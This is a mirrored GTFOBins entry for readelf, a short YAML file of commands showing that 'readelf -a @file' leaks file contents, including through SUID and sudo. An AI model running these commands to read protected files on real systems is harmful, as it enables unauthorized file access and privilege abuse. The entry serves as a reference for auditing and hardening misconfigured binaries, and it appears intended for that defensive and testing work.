1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-29 19:58:02 +01:00
GTFOBins.github.io/_gtfobins/readelf.md
2018-12-31 14:58:24 -05:00

19 lines
351 B
Markdown

---
description: |
Each line is corrupted by a prefix string and wrapped inside single quotes.
functions:
file-read:
- code: |
LFILE=file_to_read
readelf -a @$LFILE
suid:
- code: |
LFILE=file_to_read
readelf -a @$LFILE
sudo:
- code: |
LFILE=file_to_read
sudo readelf -a @$LFILE
---